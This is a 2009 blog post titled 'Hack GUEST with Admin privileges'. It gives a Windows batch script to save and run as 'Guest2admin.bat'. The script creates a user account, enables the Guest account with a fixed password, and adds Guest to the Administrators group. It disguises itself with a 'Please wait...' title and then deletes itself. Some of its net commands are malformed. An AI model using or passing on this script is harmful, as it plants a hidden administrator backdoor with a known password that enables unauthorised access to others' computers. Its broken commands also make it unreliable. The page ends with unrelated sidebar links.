echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...
~ Cheers ~
Monday, November 30, 2009
Hack "GUEST" with Admin privileges.
8:16 AM
Karthikh Venkat
Popular Posts( Last 7 Days )
-
Check out the Hot and Spicy Photos of Ye Maya Chesave actress Samantha.
-
IMPLEMENTATION OF SELECTION SORT PROGRAM: #include #include int n; void main() { int a[10],i,j; void selection(int a[10]); cl...
-
IMPLEMENTATION OF NON RECURSIVE BINARY SEARCH TREE PROGRAM: #include #include #define size 10 int n; void main() { int a[size],key,i,...
-
IMPLEMENTATION OF KRUSKALS ALGORITHM PROGRAM: #include #include #define INFINITY 999 typedef struct graph { int v1; int v2,cost; }GR;...
